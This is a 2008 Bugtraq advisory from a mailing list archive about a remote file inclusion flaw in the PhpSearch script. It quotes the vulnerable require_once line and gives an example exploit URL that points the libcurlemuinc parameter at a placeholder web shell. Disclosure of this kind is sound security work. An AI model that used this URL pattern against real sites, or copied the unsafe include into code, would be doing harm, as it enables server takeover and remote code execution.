lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20080120161102.3949.qmail@securityfocus.com>
Date: 20 Jan 2008 16:11:02 -0000
From: effectiveness63@...il.com
To: bugtraq@...urityfocus.com
Subject: Php Search Remote Inclusion

Script : PhpSearch 
Bug    : Remote File Inclusion
Author : SekoMirza 
Company : http://www.hawkententerprises.org
Download : http://www.hawkenterprises.org/dev/phpsearch.zip
Dork : not yet
_____________________________________________

Where :
phpsearch/utils/class_HTTPRetriever.php

Bug : 
if (is_readable($libcurlemuinc)) require_once($libcurlemuinc);

Explanation : 
if  class_HTTPRetriever.php is readable you can execute malicious code. 

Example : 
http://www.site.com/[path]/utils/class_HTTPRetriever.php?libcurlemuinc=[Sh3LL]

_____________________________________________

Thanx to : Str0ke , Hypn0sis , Earnk Kazno , Shadow , Ph.0 , Class 3rr0r , MadWorM ,   and all hackers

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ